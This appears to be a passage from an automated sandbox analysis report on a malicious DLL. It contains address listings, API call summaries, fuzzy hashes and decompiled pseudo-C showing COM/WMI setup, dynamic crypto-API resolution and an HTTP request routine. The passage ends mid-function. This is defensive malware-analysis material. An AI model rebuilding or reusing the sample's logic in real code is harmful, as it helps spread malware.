                                                                                                                                                                                                                                                                            0x1000d9cb
                                                                                                                                                                                                                                                                            0x1000d9d4
                                                                                                                                                                                                                                                                            0x1000d9d7
                                                                                                                                                                                                                                                                            0x1000d9da
                                                                                                                                                                                                                                                                            0x1000d9dc
                                                                                                                                                                                                                                                                            0x1000db52
                                                                                                                                                                                                                                                                            0x1000db55
                                                                                                                                                                                                                                                                            0x1000db5e
                                                                                                                                                                                                                                                                            0x1000db5e
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000db5e
                                                                                                                                                                                                                                                                            0x1000d9ec
                                                                                                                                                                                                                                                                            0x1000d9ef
                                                                                                                                                                                                                                                                            0x1000d9f6
                                                                                                                                                                                                                                                                            0x1000d9fc
                                                                                                                                                                                                                                                                            0x1000d9ff
                                                                                                                                                                                                                                                                            0x1000da02
                                                                                                                                                                                                                                                                            0x1000da05
                                                                                                                                                                                                                                                                            0x1000da08
                                                                                                                                                                                                                                                                            0x1000da44
                                                                                                                                                                                                                                                                            0x1000da44
                                                                                                                                                                                                                                                                            0x1000da47
                                                                                                                                                                                                                                                                            0x1000daf3
                                                                                                                                                                                                                                                                            0x1000db07
                                                                                                                                                                                                                                                                            0x1000db17
                                                                                                                                                                                                                                                                            0x1000db1b
                                                                                                                                                                                                                                                                            0x1000db1d
                                                                                                                                                                                                                                                                            0x1000db34
                                                                                                                                                                                                                                                                            0x1000db38
                                                                                                                                                                                                                                                                            0x1000db41
                                                                                                                                                                                                                                                                            0x1000db4c
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000db4c
                                                                                                                                                                                                                                                                            0x1000db23
                                                                                                                                                                                                                                                                            0x1000db24
                                                                                                                                                                                                                                                                            0x1000db29
                                                                                                                                                                                                                                                                            0x1000db29
                                                                                                                                                                                                                                                                            0x1000db2b
                                                                                                                                                                                                                                                                            0x1000db2c
                                                                                                                                                                                                                                                                            0x1000db31
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000db31
                                                                                                                                                                                                                                                                            0x1000da4d
                                                                                                                                                                                                                                                                            0x1000da4d
                                                                                                                                                                                                                                                                            0x1000da50
                                                                                                                                                                                                                                                                            0x1000dabb
                                                                                                                                                                                                                                                                            0x1000dacf
                                                                                                                                                                                                                                                                            0x1000dadf
                                                                                                                                                                                                                                                                            0x1000dae3
                                                                                                                                                                                                                                                                            0x1000dae5
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000daeb
                                                                                                                                                                                                                                                                            0x1000daec
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000daec
                                                                                                                                                                                                                                                                            0x1000da52
                                                                                                                                                                                                                                                                            0x1000da52
                                                                                                                                                                                                                                                                            0x1000da55
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000da57
                                                                                                                                                                                                                                                                            0x1000da5a
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000da5c
                                                                                                                                                                                                                                                                            0x1000da5c
                                                                                                                                                                                                                                                                            0x1000da62
                                                                                                                                                                                                                                                                            0x1000da7e
                                                                                                                                                                                                                                                                            0x1000da8d
                                                                                                                                                                                                                                                                            0x1000da96
                                                                                                                                                                                                                                                                            0x1000da9b
                                                                                                                                                                                                                                                                            0x1000da9e
                                                                                                                                                                                                                                                                            0x1000daa4
                                                                                                                                                                                                                                                                            0x1000daa4
                                                                                                                                                                                                                                                                            0x1000daa9
                                                                                                                                                                                                                                                                            0x1000dab5
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000dab5
                                                                                                                                                                                                                                                                            0x1000da67
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000da67
                                                                                                                                                                                                                                                                            0x1000da0a
                                                                                                                                                                                                                                                                            0x1000da31
                                                                                                                                                                                                                                                                            0x1000da36
                                                                                                                                                                                                                                                                            0x1000da3b
                                                                                                                                                                                                                                                                            0x1000da3d
                                                                                                                                                                                                                                                                            0x1000da3d
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000da3b
                                                                                                                                                                                                                                                                            0x1000da0c
                                                                                                                                                                                                                                                                            0x1000da0c
                                                                                                                                                                                                                                                                            0x1000da0f
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000da15
                                                                                                                                                                                                                                                                            0x1000da15
                                                                                                                                                                                                                                                                            0x1000da18
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000da1e
                                                                                                                                                                                                                                                                            0x1000da1e
                                                                                                                                                                                                                                                                            0x1000da21
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000da27
                                                                                                                                                                                                                                                                            0x1000da2a
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000da2c
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000da2c
                                                                                                                                                                                                                                                                            0x1000db6e
                                                                                                                                                                                                                                                                            0x1000db74
                                                                                                                                                                                                                                                                            0x1000db7a
                                                                                                                                                                                                                                                                            0x1000db7d
                                                                                                                                                                                                                                                                            0x1000db80
                                                                                                                                                                                                                                                                            0x1000db80
                                                                                                                                                                                                                                                                            0x1000db83
                                                                                                                                                                                                                                                                            0x1000db84
                                                                                                                                                                                                                                                                            0x1000db87
                                                                                                                                                                                                                                                                            0x1000db89
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000dbd9
                                                                                                                                                                                                                                                                            0x1000dbd9
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000dbd9
                                                                                                                                                                                                                                                                            0x1000d910
                                                                                                                                                                                                                                                                            0x1000d916
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000d916
                                                                                                                                                                                                                                                                            0x1000dbd6
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000d859
                                                                                                                                                                                                                                                                            0x1000d85e
                                                                                                                                                                                                                                                                            0x1000d863
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x1000d867

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 1000D2F7: CoInitializeEx.OLE32(00000000,00000000,00000000,00000000,00000000,00000000,?,1000D4B2,00000EFA,00000000,00000000,00000005), ref: 1000D30A
                                                                                                                                                                                                                                                                              • Part of subcall function 1000D2F7: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,1000D4B2,00000EFA,00000000,00000000,00000005), ref: 1000D31B
                                                                                                                                                                                                                                                                              • Part of subcall function 1000D2F7: CoCreateInstance.OLE32(1001D848,00000000,00000001,1001D858,00000000,?,1000D4B2,00000EFA,00000000,00000000,00000005), ref: 1000D332
                                                                                                                                                                                                                                                                              • Part of subcall function 1000D2F7: SysAllocString.OLEAUT32(00000000), ref: 1000D33D
                                                                                                                                                                                                                                                                              • Part of subcall function 1000D2F7: CoSetProxyBlanket.OLE32(00000005,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,1000D4B2,00000EFA,00000000,00000000,00000005), ref: 1000D368
                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 1000D874
                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 1000D888
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 1000DC11
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 1000DC1A
                                                                                                                                                                                                                                                                              • Part of subcall function 10009203: HeapFree.KERNEL32(00000000,00000000), ref: 10009249
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.393657520.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393651974.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393691292.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393703600.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.394711206.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: String$AllocFree$Initialize$BlanketCreateHeapInstanceProxySecurity
                                                                                                                                                                                                                                                                            • String ID: FALSE$TRUE
                                                                                                                                                                                                                                                                            • API String ID: 318989454-1412513891
                                                                                                                                                                                                                                                                            • Opcode ID: 919d23eae1f380bfe7b5be4e16ac5c52cd0d3706257f31220665b853bc84d9e5
                                                                                                                                                                                                                                                                            • Instruction ID: 5aa9c036717eb5a5c9b7cbab616e939d641ea401ff5d011f55a91f8be1bcc091
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 919d23eae1f380bfe7b5be4e16ac5c52cd0d3706257f31220665b853bc84d9e5
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 63E17275E00219EFEB04EFE4C885EEEBBB9FF49340F10455AE505A7289DB71A941CB60
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 30%
                                                                                                                                                                                                                                                                            			E10013259(intOrPtr* _a4) {
                                                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                                                            				_Unknown_base(*)()* _v12;
                                                                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t15;
                                                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                                                            				intOrPtr* _t25;
                                                                                                                                                                                                                                                                            				intOrPtr* _t29;
                                                                                                                                                                                                                                                                            				struct HINSTANCE__* _t30;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                                                                            				_t30 = GetModuleHandleW(L"advapi32.dll");
                                                                                                                                                                                                                                                                            				if(_t30 == 0) {
                                                                                                                                                                                                                                                                            					L7:
                                                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_t25 = GetProcAddress(_t30, "CryptAcquireContextA");
                                                                                                                                                                                                                                                                            				if(_t25 == 0) {
                                                                                                                                                                                                                                                                            					goto L7;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_t15 = GetProcAddress(_t30, "CryptGenRandom");
                                                                                                                                                                                                                                                                            				_v12 = _t15;
                                                                                                                                                                                                                                                                            				if(_t15 == 0) {
                                                                                                                                                                                                                                                                            					goto L7;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_t29 = GetProcAddress(_t30, "CryptReleaseContext");
                                                                                                                                                                                                                                                                            				if(_t29 == 0) {
                                                                                                                                                                                                                                                                            					goto L7;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_push(0xf0000000);
                                                                                                                                                                                                                                                                            				_push(1);
                                                                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                                                                            				_push( &_v8);
                                                                                                                                                                                                                                                                            				if( *_t25() == 0) {
                                                                                                                                                                                                                                                                            					goto L7;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_t20 = _v12(_v8, 4,  &_v16);
                                                                                                                                                                                                                                                                            				 *_t29(_v8, 0);
                                                                                                                                                                                                                                                                            				if(_t20 == 0) {
                                                                                                                                                                                                                                                                            					goto L7;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				 *_a4 = E100131B4( &_v16);
                                                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                                                            			}











                                                                                                                                                                                                                                                                            0x1001325f
                                                                                                                                                                                                                                                                            0x10013271
                                                                                                                                                                                                                                                                            0x10013275
                                                                                                                                                                                                                                                                            0x100132e9
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x100132eb
                                                                                                                                                                                                                                                                            0x10013285
                                                                                                                                                                                                                                                                            0x10013289
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x10013291
                                                                                                                                                                                                                                                                            0x10013293
                                                                                                                                                                                                                                                                            0x10013298
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x100132a2
                                                                                                                                                                                                                                                                            0x100132a6
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x100132a8
                                                                                                                                                                                                                                                                            0x100132ad
                                                                                                                                                                                                                                                                            0x100132af
                                                                                                                                                                                                                                                                            0x100132b1
                                                                                                                                                                                                                                                                            0x100132b6
                                                                                                                                                                                                                                                                            0x100132bb
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x100132c6
                                                                                                                                                                                                                                                                            0x100132d0
                                                                                                                                                                                                                                                                            0x100132d4
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x100132e3
                                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(advapi32.dll,00000000,00000000,?,10008254,00000000), ref: 1001326B
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 10013283
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CryptGenRandom), ref: 10013291
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 100132A0
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.393657520.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393651974.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393691292.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.393703600.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000F.00000002.394711206.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                                                            • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
                                                                                                                                                                                                                                                                            • API String ID: 667068680-129414566
                                                                                                                                                                                                                                                                            • Opcode ID: ecc3d0c9c8d29e75a8d695109f5af85a5ebb6e8c0cf637ab81bd802e9145332d
                                                                                                                                                                                                                                                                            • Instruction ID: 44cfbbe63dd5ec5fb2c5023fe683171a121c93bc589d1a284ce58b4995778660
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ecc3d0c9c8d29e75a8d695109f5af85a5ebb6e8c0cf637ab81bd802e9145332d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7D118236A00619B7DB11E6E98C45F9EB7ECDF45650F114072FA00EA140DB76DA848698
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 78%
                                                                                                                                                                                                                                                                            			E1000F11F(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
                                                                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                                                                                                                            				signed int _v28;
                                                                                                                                                                                                                                                                            				char _v32;
                                                                                                                                                                                                                                                                            				intOrPtr _v36;
                                                                                                                                                                                                                                                                            				signed int _v40;
                                                                                                                                                                                                                                                                            				signed int _v44;
                                                                                                                                                                                                                                                                            				intOrPtr _v48;
                                                                                                                                                                                                                                                                            				intOrPtr _v52;
                                                                                                                                                                                                                                                                            				intOrPtr _v56;
                                                                                                                                                                                                                                                                            				intOrPtr _v60;
                                                                                                                                                                                                                                                                            				char _v64;
                                                                                                                                                                                                                                                                            				int _v76;
                                                                                                                                                                                                                                                                            				void* _v80;
                                                                                                                                                                                                                                                                            				intOrPtr _v100;
                                                                                                                                                                                                                                                                            				int _v104;
                                                                                                                                                                                                                                                                            				void* _v108;
                                                                                                                                                                                                                                                                            				intOrPtr _v112;
                                                                                                                                                                                                                                                                            				intOrPtr _v116;
                                                                                                                                                                                                                                                                            				char* _v120;
                                                                                                                                                                                                                                                                            				char _v124;
                                                                                                                                                                                                                                                                            				char _v140;
                                                                                                                                                                                                                                                                            				void _v396;
                                                                                                                                                                                                                                                                            				void _v652;
                                                                                                                                                                                                                                                                            				intOrPtr _t91;
                                                                                                                                                                                                                                                                            				intOrPtr _t99;
                                                                                                                                                                                                                                                                            				intOrPtr* _t101;
                                                                                                                                                                                                                                                                            				intOrPtr _t106;
                                                                                                                                                                                                                                                                            				signed int _t107;
                                                                                                                                                                                                                                                                            				void* _t108;
                                                                                                                                                                                                                                                                            				intOrPtr _t109;
                                                                                                                                                                                                                                                                            				signed int _t110;
                                                                                                                                                                                                                                                                            				intOrPtr _t112;
                                                                                                                                                                                                                                                                            				char _t114;
                                                                                                                                                                                                                                                                            				intOrPtr _t119;
                                                                                                                                                                                                                                                                            				intOrPtr _t126;
                                                                                                                                                                                                                                                                            				intOrPtr _t130;
                                                                                                                                                                                                                                                                            				intOrPtr _t134;
                                                                                                                                                                                                                                                                            				intOrPtr _t136;
                                                                                                                                                                                                                                                                            				intOrPtr _t138;
                                                                                                                                                                                                                                                                            				char _t142;
                                                                                                                                                                                                                                                                            				intOrPtr _t144;
                                                                                                                                                                                                                                                                            				void* _t154;
                                                                                                                                                                                                                                                                            				signed int _t156;
                                                                                                                                                                                                                                                                            				intOrPtr _t162;
                                                                                                                                                                                                                                                                            				intOrPtr _t167;
                                                                                                                                                                                                                                                                            				signed int _t168;
                                                                                                                                                                                                                                                                            				signed int _t176;
                                                                                                                                                                                                                                                                            				char _t182;
                                                                                                                                                                                                                                                                            				signed int _t183;
                                                                                                                                                                                                                                                                            				void* _t184;
                                                                                                                                                                                                                                                                            				signed int _t186;
                                                                                                                                                                                                                                                                            				signed int _t187;
                                                                                                                                                                                                                                                                            				signed int _t188;
                                                                                                                                                                                                                                                                            				char _t189;
                                                                                                                                                                                                                                                                            				void* _t190;
                                                                                                                                                                                                                                                                            				void* _t191;
                                                                                                                                                                                                                                                                            				intOrPtr* _t193;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t157 = __ecx;
                                                                                                                                                                                                                                                                            				_v40 = _v40 & 0x00000000;
                                                                                                                                                                                                                                                                            				_t184 = __edx;
                                                                                                                                                                                                                                                                            				_v24 = __ecx;
                                                                                                                                                                                                                                                                            				_v32 = 4;
                                                                                                                                                                                                                                                                            				_v36 = 1;
                                                                                                                                                                                                                                                                            				memset( &_v396, 0, 0x100);
                                                                                                                                                                                                                                                                            				memset( &_v652, 0, 0x100);
                                                                                                                                                                                                                                                                            				_t193 = _t191 + 0x18;
                                                                                                                                                                                                                                                                            				_v64 = E10009192(_t157, 0x503);
                                                                                                                                                                                                                                                                            				 *_t193 = 0x14ee;
                                                                                                                                                                                                                                                                            				_v60 = E10009192(_t157);
                                                                                                                                                                                                                                                                            				 *_t193 = 0x18a;
                                                                                                                                                                                                                                                                            				_v56 = E10009192(_t157);
                                                                                                                                                                                                                                                                            				 *_t193 = 0x128f;
                                                                                                                                                                                                                                                                            				_v52 = E10009192(_t157);
                                                                                                                                                                                                                                                                            				 *_t193 = 0xe8b;
                                                                                                                                                                                                                                                                            				_t91 = E10009192(_t157);
                                                                                                                                                                                                                                                                            				_v44 = _v44 & 0;
                                                                                                                                                                                                                                                                            				_t182 = 0x3c;
                                                                                                                                                                                                                                                                            				_v48 = _t91;
                                                                                                                                                                                                                                                                            				E1000936A( &_v124, 0, 0x100);
                                                                                                                                                                                                                                                                            				_v116 = 0x10;
                                                                                                                                                                                                                                                                            				_v120 =  &_v140;
                                                                                                                                                                                                                                                                            				_v124 = _t182;
                                                                                                                                                                                                                                                                            				_v108 =  &_v396;
                                                                                                                                                                                                                                                                            				_v104 = 0x100;
                                                                                                                                                                                                                                                                            				_v80 =  &_v652;
                                                                                                                                                                                                                                                                            				_push( &_v124);
                                                                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                                                                            				_v76 = 0x100;
                                                                                                                                                                                                                                                                            				_push(E1000CF09(_t184));
                                                                                                                                                                                                                                                                            				_t99 =  *0x10020fb8; // 0x0
                                                                                                                                                                                                                                                                            				_push(_t184);
                                                                                                                                                                                                                                                                            				if( *((intOrPtr*)(_t99 + 0x28))() != 0) {
                                                                                                                                                                                                                                                                            					_t176 = 0;
                                                                                                                                                                                                                                                                            					__eflags = 0;
                                                                                                                                                                                                                                                                            					_v28 = 0;
                                                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                                                            						_t101 =  *0x10020fb8; // 0x0
                                                                                                                                                                                                                                                                            						_v12 = 0x8404f700;
                                                                                                                                                                                                                                                                            						_t183 =  *_t101( *0x100210cc,  *((intOrPtr*)(_t190 + _t176 * 4 - 0x24)), 0, 0, 0);
                                                                                                                                                                                                                                                                            						__eflags = _t183;
                                                                                                                                                                                                                                                                            						if(_t183 != 0) {
                                                                                                                                                                                                                                                                            							E1000F0B7(_t183);
                                                                                                                                                                                                                                                                            							_t106 =  *0x10020fb8; // 0x0
                                                                                                                                                                                                                                                                            							_t107 =  *((intOrPtr*)(_t106 + 0x1c))(_t183,  &_v396, _v100, 0, 0, 3, 0, 0);
                                                                                                                                                                                                                                                                            							__eflags = _a24;
                                                                                                                                                                                                                                                                            							_t156 = _t107;
                                                                                                                                                                                                                                                                            							if(_a24 != 0) {
                                                                                                                                                                                                                                                                            								E1000C3B5(_a24);
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							__eflags = _t156;
                                                                                                                                                                                                                                                                            							if(_t156 != 0) {
                                                                                                                                                                                                                                                                            								__eflags = _v112 - 4;
                                                                                                                                                                                                                                                                            								_t162 = 0x8484f700;
                                                                                                                                                                                                                                                                            								if(_v112 != 4) {
                                                                                                                                                                                                                                                                            									_t162 = _v12;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								__eflags = _v24 - 2;
                                                                                                                                                                                                                                                                            								_t108 = 0x1001df14;
                                                                                                                                                                                                                                                                            								if(_v24 != 2) {
                                                                                                                                                                                                                                                                            									_t108 = 0x1001df1c;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								_t164 =  &_v652;
                                                                                                                                                                                                                                                                            								_t109 =  *0x10020fb8; // 0x0
                                                                                                                                                                                                                                                                            								_t110 =  *((intOrPtr*)(_t109 + 0x20))(_t156, _t108,  &_v652, 0, 0,  &_v64, _t162, 0);
                                                                                                                                                                                                                                                                            								__eflags = _a24;
                                                                                                                                                                                                                                                                            								_t186 = _t110;
                                                                                                                                                                                                                                                                            								_v8 = _t186;
                                                                                                                                                                                                                                                                            								if(_a24 != 0) {
                                                                                                                                                                                                                                                                            									_t164 = _a24;
                                                                                                                                                                                                                                                                            									E1000C3B5(_a24);
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								__eflags = _t186;
                                                                                                                                                                                                                                                                            								if(_t186 != 0) {
                                                                                                                                                                                                                                                                            									__eflags = _v112 - 4;
                                                                                                                                                                                                                                                                            									if(_v112 == 4) {
                                                                                                                                                                                                                                                                            										_t164 = _t186;
                                                                                                                                                                                                                                                                            										E1000F065(_t186);
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									__eflags = _v24 - 2;
                                                                                                                                                                                                                                                                            									if(_v24 != 2) {
                                                                                                                                                                                                                                                                            										__eflags = 0;
                                                                                                                                                                                                                                                                            										_t112 =  *0x10020fb8; // 0x0
                                                                                                                                                                                                                                                                            										_v12 =  *((intOrPtr*)(_t112 + 0x24))(_t186, 0, 0, 0, 0);
                                                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                                                            										_t142 = E10009192(_t164, 0xfb3);
                                                                                                                                                                                                                                                                            										_t189 = _t142;
                                                                                                                                                                                                                                                                            										_v16 = _t189;
                                                                                                                                                                                                                                                                            										_t144 =  *0x10020fb8; // 0x0
                                                                                                                                                                                                                                                                            										_t186 = _v8;
                                                                                                                                                                                                                                                                            										_v12 =  *((intOrPtr*)(_t144 + 0x24))(_t186, _t189, E1000CF09(_t189), _a4, _a8);
                                                                                                                                                                                                                                                                            										E10009E14( &_v16);
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									__eflags = _a24;
                                                                                                                                                                                                                                                                            									if(_a24 != 0) {
                                                                                                                                                                                                                                                                            										E1000C3B5(_a24);
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									__eflags = _v12;
                                                                                                                                                                                                                                                                            									if(_v12 != 0) {
                                                                                                                                                                                                                                                                            										L31:
                                                                                                                                                                                                                                                                            										_t114 = 8;
                                                                                                                                                                                                                                                                            										_v32 = _t114;
                                                                                                                                                                                                                                                                            										_v20 = 0;
                                                                                                                                                                                                                                                                            										_v16 = 0;
                                                                                                                                                                                                                                                                            										E1000936A( &_v20, 0, _t114);
                                                                                                                                                                                                                                                                            										_t119 =  *0x10020fb8; // 0x0
                                                                                                                                                                                                                                                                            										__eflags =  *((intOrPtr*)(_t119 + 0xc))(_t186, 0x13,  &_v20,  &_v32, 0);
                                                                                                                                                                                                                                                                            										if(__eflags != 0) {
                                                                                                                                                                                                                                                                            											_t187 = E1000C2C8( &_v20, __eflags);
                                                                                                                                                                                                                                                                            											__eflags = _t187 - 0xc8;
                                                                                                                                                                                                                                                                            											if(_t187 == 0xc8) {
                                                                                                                                                                                                                                                                            												 *_a20 = _v8;
                                                                                                                                                                                                                                                                            												 *_a12 = _t183;
                                                                                                                                                                                                                                                                            												 *_a16 = _t156;
                                                                                                                                                                                                                                                                            												__eflags = 0;
                                                                                                                                                                                                                                                                            												return 0;
                                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                                            											_t188 =  ~_t187;
                                                                                                                                                                                                                                                                            											L35:
                                                                                                                                                                                                                                                                            											_t126 =  *0x10020fb8; // 0x0
                                                                                                                                                                                                                                                                            											 *((intOrPtr*)(_t126 + 8))(_v8);
                                                                                                                                                                                                                                                                            											L36:
                                                                                                                                                                                                                                                                            											__eflags = _t156;
                                                                                                                                                                                                                                                                            											if(_t156 != 0) {
                                                                                                                                                                                                                                                                            												_t130 =  *0x10020fb8; // 0x0
                                                                                                                                                                                                                                                                            												 *((intOrPtr*)(_t130 + 8))(_t156);
                                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                                            											__eflags = _t183;
                                                                                                                                                                                                                                                                            											if(_t183 != 0) {
                                                                                                                                                                                                                                                                            												_t167 =  *0x10020fb8; // 0x0
                                                                                                                                                                                                                                                                            												 *((intOrPtr*)(_t167 + 8))(_t183);
                                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                                            											return _t188;
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            										GetLastError();
                                                                                                                                                                                                                                                                            										_t188 = 0xfffffff8;
                                                                                                                                                                                                                                                                            										goto L35;
                                                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                                                            										GetLastError();
                                                                                                                                                                                                                                                                            										_t134 =  *0x10020fb8; // 0x0
                                                                                                                                                                                                                                                                            										 *((intOrPtr*)(_t134 + 8))(_t186);
                                                                                                                                                                                                                                                                            										_t186 = 0;
                                                                                                                                                                                                                                                                            										__eflags = 0;
                                                                                                                                                                                                                                                                            										goto L26;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            								} else {
